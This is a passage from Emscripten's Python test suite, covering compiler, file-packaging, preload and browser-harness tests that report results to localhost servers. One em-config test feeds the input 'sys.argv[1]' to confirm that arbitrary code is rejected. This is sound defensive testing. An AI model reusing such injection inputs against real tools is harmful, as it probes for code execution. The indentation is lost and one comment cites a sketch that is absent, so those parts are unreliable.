Popen([PYTHON, EMCC, path_from_root('tests', 'embind', 'embind_test.cpp'), '--post-js', path_from_root('tests', 'embind', 'underscore-1.4.2.js'), '--post-js', path_from_root('tests', 'embind', 'imvu_test_adapter.js'), '--post-js', path_from_root('tests', 'embind', 'embind.test.js')] + args, stderr=PIPE if fail else None).communicate()
assert os.path.exists(self.in_dir('a.out.js')) == (not fail)
if not fail:
output = run_js(self.in_dir('a.out.js'), stdout=PIPE, stderr=PIPE, full_output=True)
assert "FAIL" not in output, output
def test_llvm_nativizer(self):
try:
Popen(['as', '--version'], stdout=PIPE, stderr=PIPE).communicate()
except OSError:
return self.skip('no gnu as, cannot run nativizer')
# avoid impure_ptr problems etc.
shutil.copyfile(path_from_root('tests', 'files.cpp'), os.path.join(self.get_dir(), 'files.cpp'))
open(os.path.join(self.get_dir(), 'somefile.binary'), 'w').write('''waka waka############################''')
open(os.path.join(self.get_dir(), 'test.file'), 'w').write('''ay file..............,,,,,,,,,,,,,,''')
open(os.path.join(self.get_dir(), 'stdin'), 'w').write('''inter-active''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'files.cpp'), '-c']).communicate()
Popen([PYTHON, path_from_root('tools', 'nativize_llvm.py'), os.path.join(self.get_dir(), 'files.o')]).communicate()
output = Popen([os.path.join(self.get_dir(), 'files.o.run')], stdin=open(os.path.join(self.get_dir(), 'stdin')), stdout=PIPE, stderr=PIPE).communicate()
self.assertContained('''size: 37
data: 119,97,107,97,32,119,97,107,97,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35
loop: 119 97 107 97 32 119 97 107 97 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35
input:inter-active
texto
$
5 : 10,30,20,11,88
other=ay file...
seeked= file.
''', output[0])
self.assertIdentical('texte\n', output[1])
def test_emconfig(self):
output = Popen([PYTHON, EMCONFIG, 'LLVM_ROOT'], stdout=PIPE, stderr=PIPE).communicate()[0].strip()
try:
assert output == LLVM_ROOT
except:
print >> sys.stderr, 'Assertion failed: python %s LLVM_ROOT returned "%s" instead of expected "%s"!' % (EMCONFIG, output, LLVM_ROOT)
raise
invalid = 'Usage: em-config VAR_NAME'
# Don't accept variables that do not exist
output = Popen([PYTHON, EMCONFIG, 'VAR_WHICH_DOES_NOT_EXIST'], stdout=PIPE, stderr=PIPE).communicate()[0].strip()
assert output == invalid
# Don't accept no arguments
output = Popen([PYTHON, EMCONFIG], stdout=PIPE, stderr=PIPE).communicate()[0].strip()
assert output == invalid
# Don't accept more than one variable
output = Popen([PYTHON, EMCONFIG, 'LLVM_ROOT', 'EMCC'], stdout=PIPE, stderr=PIPE).communicate()[0].strip()
assert output == invalid
# Don't accept arbitrary python code
output = Popen([PYTHON, EMCONFIG, 'sys.argv[1]'], stdout=PIPE, stderr=PIPE).communicate()[0].strip()
assert output == invalid
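# Hedged sketch of the validation the cases above demand of an em-config-style
# tool: accept exactly one bare identifier that names a known variable, and
# nothing else (in particular no expressions like sys.argv[1]). Names here are
# illustrative, not the tool's real internals.
import re
def _emconfig_lookup_sketch(args, known_vars):
  usage = 'Usage: em-config VAR_NAME'
  if len(args) != 1:
    return usage
  name = args[0]
  if not re.match(r'^[A-Za-z_][A-Za-z0-9_]*$', name) or name not in known_vars:
    return usage
  return str(known_vars[name])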
def test_link_s(self):
# -s OPT=VALUE can conflict with -s as a linker option. We warn and ignore
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
extern "C" {
void something();
}
int main() {
something();
return 0;
}
''')
open(os.path.join(self.get_dir(), 'supp.cpp'), 'w').write(r'''
#include <stdio.h>
extern "C" {
void something() {
printf("yello\n");
}
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-o', 'main.o']).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'supp.cpp'), '-o', 'supp.o']).communicate()
output = Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.o'), '-s', os.path.join(self.get_dir(), 'supp.o'), '-s', 'SAFE_HEAP=1'], stderr=PIPE).communicate()
self.assertContained('treating -s as linker option', output[1])
output = run_js('a.out.js')
assert 'yello' in output, 'code works'
code = open('a.out.js').read()
assert 'SAFE_HEAP' in code, 'valid -s option had an effect'
def test_jcache_printf(self):
open(self.in_dir('src.cpp'), 'w').write(r'''
#include <stdio.h>
#include <stdint.h>
#include <emscripten.h>
int main() {
emscripten_jcache_printf("hello world\n");
emscripten_jcache_printf("hello %d world\n", 5);
emscripten_jcache_printf("hello %.3f world\n", 123.456789123);
emscripten_jcache_printf("hello %llx world\n", 0x1234567811223344ULL);
return 0;
}
''')
Popen([PYTHON, EMCC, self.in_dir('src.cpp')]).communicate()
output = run_js('a.out.js')
self.assertIdentical('hello world\nhello 5 world\nhello 123.457 world\nhello 1234567811223300 world\n', output)
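# The truncated %llx case above is expected: jcache printf routes values through
# JS doubles, which keep only 53 mantissa bits. The same rounding is visible in
# plain Python:
def _double_truncation_sketch():
  value = 0x1234567811223344
  assert int(float(value)) == 0x1234567811223300 # low bits rounded away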
def test_conftest_s_flag_passing(self):
open(os.path.join(self.get_dir(), 'conftest.c'), 'w').write(r'''
int main() {
return 0;
}
''')
os.environ["EMMAKEN_JUST_CONFIGURE"] = "1"
cmd = [PYTHON, EMCC, '-s', 'ASSERTIONS=1', os.path.join(self.get_dir(), 'conftest.c'), '-o', 'conftest']
output = Popen(cmd, stderr=PIPE).communicate()
del os.environ["EMMAKEN_JUST_CONFIGURE"]
self.assertNotContained('emcc: warning: treating -s as linker option', output[1])
assert os.path.exists('conftest')
def test_crunch(self):
# crunch should not be run if a .crn exists that is more recent than the .dds
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
time.sleep(0.1)
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--pre-run', '--crunch=32', '--preload', 'ship.dds'], stdout=open('pre.js', 'w')).communicate()
assert os.stat('test.data').st_size < 0.25*os.stat('ship.dds').st_size, 'Compressed should be much smaller than dds'
crunch_time = os.stat('ship.crn').st_mtime
dds_time = os.stat('ship.dds').st_mtime
assert crunch_time > dds_time, 'Crunch is more recent'
# run again, should not recrunch!
time.sleep(0.1)
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--pre-run', '--crunch=32', '--preload', 'ship.dds'], stdout=open('pre.js', 'w')).communicate()
assert crunch_time == os.stat('ship.crn').st_mtime, 'Crunch is unchanged'
# update dds, so should recrunch
time.sleep(0.1)
os.utime('ship.dds', None)
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--pre-run', '--crunch=32', '--preload', 'ship.dds'], stdout=open('pre.js', 'w')).communicate()
assert crunch_time < os.stat('ship.crn').st_mtime, 'Crunch was changed'
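# Sketch of the freshness rule this test pins down (assumed semantics of the
# packager's crunch step): recrunch only when the .crn is missing or older than
# its source .dds.
def _needs_recrunch_sketch(dds_path, crn_path):
  if not os.path.exists(crn_path):
    return True
  return os.stat(crn_path).st_mtime < os.stat(dds_path).st_mtime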
def test_headless(self):
if SPIDERMONKEY_ENGINE not in JS_ENGINES: return self.skip('cannot run without spidermonkey due to node limitations (Uint8ClampedArray etc.)')
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'example.png'))
Popen([PYTHON, EMCC, path_from_root('tests', 'sdl_canvas.c'), '-s', 'HEADLESS=1']).communicate()
output = run_js('a.out.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE)
assert '''Init: 0
Font: 0x1
Sum: 0
you should see two lines of text in different colors and a blue rectangle
SDL_Quit called (and ignored)
done.
''' in output, output
elif 'browser' in str(sys.argv):
# Browser tests.
''' Enable this code to run the tests in a browser other than the one webbrowser detects as default
def run_in_other_browser(url):
execute(['yourbrowser', url])
webbrowser.open_new = run_in_other_browser
'''
print
print 'Running the browser tests. Make sure the browser allows popups from localhost.'
print
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(q):
class TestServerHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(s):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
if s.path == '/run_harness':
s.wfile.write(open(path_from_root('tests', 'browser_harness.html')).read())
else:
result = 'False'
if not q.empty():
result = q.get()
s.wfile.write(result)
s.wfile.close()
def log_request(self, code=0, size=0):
# don't log; too noisy
pass
httpd = BaseHTTPServer.HTTPServer(('localhost', 9999), TestServerHandler)
httpd.serve_forever() # test runner will kill us
def server_func(dir, q):
class TestServerHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(s):
if 'report_' in s.path:
q.put(s.path)
else:
filename = s.path[1:]
if os.path.exists(filename):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(open(filename).read())
s.wfile.close()
else:
s.send_response(500)
s.send_header("Content-type", "text/html")
s.end_headers()
def log_request(self, code=0, size=0):
# don't log; too noisy
pass
os.chdir(dir)
httpd = BaseHTTPServer.HTTPServer(('localhost', 8888), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class browser(RunnerCore):
def __init__(self, *args, **kwargs):
super(browser, self).__init__(*args, **kwargs)
if hasattr(browser, 'harness_server'): return
browser.harness_queue = multiprocessing.Queue()
browser.harness_server = multiprocessing.Process(target=harness_server_func, args=(browser.harness_queue,))
browser.harness_server.start()
print '[Browser harness server on process %d]' % browser.harness_server.pid
webbrowser.open_new('http://localhost:9999/run_harness')
@classmethod
def tearDownClass(cls):
if not hasattr(browser, 'harness_server'): return
browser.harness_server.terminate()
delattr(browser, 'harness_server')
print '[Browser harness server terminated]'
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def run_browser(self, html_file, message, expectedResult=None):
if expectedResult is not None:
try:
queue = multiprocessing.Queue()
server = multiprocessing.Process(target=functools.partial(server_func, self.get_dir()), args=(queue,))
server.start()
browser.harness_queue.put('http://localhost:8888/' + html_file)
output = '[no http server activity]'
start = time.time()
while time.time() - start < 60:
if not queue.empty():
output = queue.get()
break
time.sleep(0.1)
self.assertIdentical(expectedResult, output)
finally:
server.terminate()
time.sleep(0.1) # see comment about Windows above
else:
webbrowser.open_new(os.path.abspath(html_file))
print 'A web browser window should have opened a page containing the results of a part of this test.'
print 'You need to manually look at the page to see that it works ok: ' + message
print '(sleeping for a bit to keep the directory alive for the web browser..)'
time.sleep(5)
print '(moving on..)'
def with_report_result(self, code):
return r'''
#if EMSCRIPTEN
#include <emscripten.h>
#define REPORT_RESULT_INTERNAL(sync) \
char output[1000]; \
sprintf(output, \
"xhr = new XMLHttpRequest();" \
"xhr.open('GET', 'http://localhost:8888/report_result?%d'%s);" \
"xhr.send();", result, sync ? ", false" : ""); \
emscripten_run_script(output); \
emscripten_run_script("setTimeout(function() { window.close() }, 1000)"); // comment this out to keep the test runner window open to debug
#define REPORT_RESULT() REPORT_RESULT_INTERNAL(0)
#endif
''' + code
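# The REPORT_RESULT macro injected above closes the loop with server_func: the
# compiled page issues a GET to localhost:8888/report_result?<value>, which the
# harness queue picks up as the test's outcome.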
def reftest(self, expected):
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
open(os.path.join(self.get_dir(), 'reftest.js'), 'w').write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + wrong);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
Module['postRun'] = doReftest;
Module['preRun'].push(function() {
setTimeout(doReftest, 1000); // if run() throws an exception and postRun is not called, this will kick in
});
''' % basename)
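# Hedged Python analogue of the metric reftest.js computes above: mean absolute
# per-channel difference over RGB (alpha ignored), floored so minor antialiasing
# differences round down to zero.
def _reftest_metric_sketch(expected, actual, width, height):
  total = 0
  for y in range(height):
    for x in range(width):
      base = (y * width + x) * 4 # RGBA stride
      for c in range(3): # compare R, G, B; skip alpha
        total += abs(expected[base + c] - actual[base + c])
  return total // (width * height * 3)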
def test_html(self):
# test HTML generation.
self.btest('hello_world_sdl.cpp', reference='htmltest.png',
message='You should see "hello, world!" and a colored cube.')
def test_html_source_map(self):
if 'test_html_source_map' not in str(sys.argv): return self.skip('''This test
requires manual intervention; will not be run unless explicitly requested''')
cpp_file = os.path.join(self.get_dir(), 'src.cpp')
html_file = os.path.join(self.get_dir(), 'src.html')
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4'],
cwd=self.get_dir()).communicate()
webbrowser.open_new('file://' + html_file)
print '''
Set the debugger to pause on exceptions
You should see an exception thrown at src.cpp:7.
Press any key to continue.'''
raw_input()
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK): return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
Popen(['sh', './doit.sh']).communicate()
finally:
os.chdir(cwd)
def test_split(self):
# test HTML generation.
self.reftest(path_from_root('tests', 'htmltest.png'))
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_sdl.cpp'), '-o', 'something.js', '--split', '100', '--pre-js', 'reftest.js']).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'something.js')), 'must be main js file'
assert os.path.exists(os.path.join(self.get_dir(), 'something_functions.js')), 'must be functions js file'
assert os.path.exists(os.path.join(self.get_dir(), 'something.include.html')), 'must be js include file'
open(os.path.join(self.get_dir(), 'something.html'), 'w').write('''
<!doctype html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Emscripten-Generated Code</title>
<style>
.emscripten { padding-right: 0; margin-left: auto; margin-right: auto; display: block; }
canvas.emscripten { border: 1px solid black; }
textarea.emscripten { font-family: monospace; width: 80%; }
div.emscripten { text-align: center; }
</style>
</head>
<body>
<hr/>
<div class="emscripten" id="status">Downloading...</div>
<div class="emscripten">
<progress value="0" max="100" id="progress" hidden=1></progress>
</div>
<canvas class="emscripten" id="canvas" oncontextmenu="event.preventDefault()"></canvas>
<hr/>
<div class="emscripten"><input type="button" value="fullscreen" onclick="Module.requestFullScreen()"></div>
<hr/>
<textarea class="emscripten" id="output" rows="8"></textarea>
<hr>
<script type='text/javascript'>
// connect to canvas
var Module = {
preRun: [],
postRun: [],
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
// These replacements are necessary if you render to raw HTML
//text = text.replace(/&/g, "&");
//text = text.replace(/</g, "<");
//text = text.replace(/>/g, ">");
//text = text.replace('\\n', '<br>', 'g');
element.value += text + "\\n";
element.scrollTop = 99999; // focus on bottom
};
})(),
printErr: function(text) {
if (0) { // XXX disabled for safety; was: if (typeof dump == 'function') {
dump(text + '\\n'); // fast, straight to the real console
} else {
console.log(text);
}
},
canvas: document.getElementById('canvas'),
setStatus: function(text) {
if (Module.setStatus.interval) clearInterval(Module.setStatus.interval);
var m = text.match(/([^(]+)\((\d+(\.\d+)?)\/(\d+)\)/);
var statusElement = document.getElementById('status');
var progressElement = document.getElementById('progress');
if (m) {
text = m[1];
progressElement.value = parseInt(m[2])*100;
progressElement.max = parseInt(m[4])*100;
progressElement.hidden = false;
} else {
progressElement.value = null;
progressElement.max = null;
progressElement.hidden = true;
}
statusElement.innerHTML = text;
},
totalDependencies: 0,
monitorRunDependencies: function(left) {
this.totalDependencies = Math.max(this.totalDependencies, left);
Module.setStatus(left ? 'Preparing... (' + (this.totalDependencies-left) + '/' + this.totalDependencies + ')' : 'All downloads complete.');
}
};
Module.setStatus('Downloading...');
</script>''' + open(os.path.join(self.get_dir(), 'something.include.html')).read() + '''
</body>
</html>
''')
self.run_browser('something.html', 'You should see "hello, world!" and a colored cube.', '/report_result?0')
def test_split_in_source_filenames(self):
self.reftest(path_from_root('tests', 'htmltest.png'))
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_sdl.cpp'), '-o', 'something.js', '-g', '--split', '100', '--pre-js', 'reftest.js']).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'something.js')), 'must be main js file'
assert os.path.exists(self.get_dir() + '/something/' + path_from_root('tests', 'hello_world_sdl.cpp.js')), 'must be functions js file'
assert os.path.exists(os.path.join(self.get_dir(), 'something.include.html')), 'must be js include file'
open(os.path.join(self.get_dir(), 'something.html'), 'w').write('''
<!doctype html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Emscripten-Generated Code</title>
<style>
.emscripten { padding-right: 0; margin-left: auto; margin-right: auto; display: block; }
canvas.emscripten { border: 1px solid black; }
textarea.emscripten { font-family: monospace; width: 80%; }
div.emscripten { text-align: center; }
</style>
</head>
<body>
<hr/>
<div class="emscripten" id="status">Downloading...</div>
<div class="emscripten">
<progress value="0" max="100" id="progress" hidden=1></progress>
</div>
<canvas class="emscripten" id="canvas" oncontextmenu="event.preventDefault()"></canvas>
<hr/>
<div class="emscripten"><input type="button" value="fullscreen" onclick="Module.requestFullScreen()"></div>
<hr/>
<textarea class="emscripten" id="output" rows="8"></textarea>
<hr>
<script type='text/javascript'>
// connect to canvas
var Module = {
preRun: [],
postRun: [],
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
// These replacements are necessary if you render to raw HTML
//text = text.replace(/&/g, "&");
//text = text.replace(/</g, "<");
//text = text.replace(/>/g, ">");
//text = text.replace('\\n', '<br>', 'g');
element.value += text + "\\n";
element.scrollTop = 99999; // focus on bottom
};
})(),
printErr: function(text) {
if (0) { // XXX disabled for safety; was: if (typeof dump == 'function') {
dump(text + '\\n'); // fast, straight to the real console
} else {
console.log(text);
}
},
canvas: document.getElementById('canvas'),
setStatus: function(text) {
if (Module.setStatus.interval) clearInterval(Module.setStatus.interval);
var m = text.match(/([^(]+)\((\d+(\.\d+)?)\/(\d+)\)/);
var statusElement = document.getElementById('status');
var progressElement = document.getElementById('progress');
if (m) {
text = m[1];
progressElement.value = parseInt(m[2])*100;
progressElement.max = parseInt(m[4])*100;
progressElement.hidden = false;
} else {
progressElement.value = null;
progressElement.max = null;
progressElement.hidden = true;
}
statusElement.innerHTML = text;
},
totalDependencies: 0,
monitorRunDependencies: function(left) {
this.totalDependencies = Math.max(this.totalDependencies, left);
Module.setStatus(left ? 'Preparing... (' + (this.totalDependencies-left) + '/' + this.totalDependencies + ')' : 'All downloads complete.');
}
};
Module.setStatus('Downloading...');
</script>''' + open(os.path.join(self.get_dir(), 'something.include.html')).read() + '''
</body>
</html>
''')
self.run_browser('something.html', 'You should see "hello, world!" and a colored cube.', '/report_result?0')
def test_compression(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
printf("hello compressed world\n");
int result = 1;
REPORT_RESULT();
return 0;
}
'''))
self.build_native_lzma()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-o', 'page.html',
'--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
'LZMA.decompress')]).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'page.js')), 'must be side js'
assert os.path.exists(os.path.join(self.get_dir(), 'page.js.compress')), 'must be side compressed js'
assert os.stat(os.path.join(self.get_dir(), 'page.js')).st_size > os.stat(os.path.join(self.get_dir(), 'page.js.compress')).st_size, 'compressed file must be smaller'
shutil.move(os.path.join(self.get_dir(), 'page.js'), 'page.js.renamedsoitcannotbefound')
self.run_browser('page.html', '', '/report_result?1')
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
def make_main(path):
print path
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT();
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load; see the parsing sketch after this list)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt")]
for test in test_cases:
(srcpath, dstpath) = test
make_main(dstpath)
print srcpath
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main(absolute_src_path)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT();
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print srcpath
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main(absolute_src_path)
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except OSError:
pass # the directory may already exist
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html']).communicate()
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false);
};
''')
make_main('someotherfile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
def test_preload_caching(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print path
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT();
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
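# The two run_browser calls above encode the caching contract: the first page
# load populates the preload cache (0 packages fromCache, result 1), and the
# reload serves the package from cache (1 fromCache, result 2).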
def test_multifile(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'))
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT();
return 0;
}
'''))
# by individual files
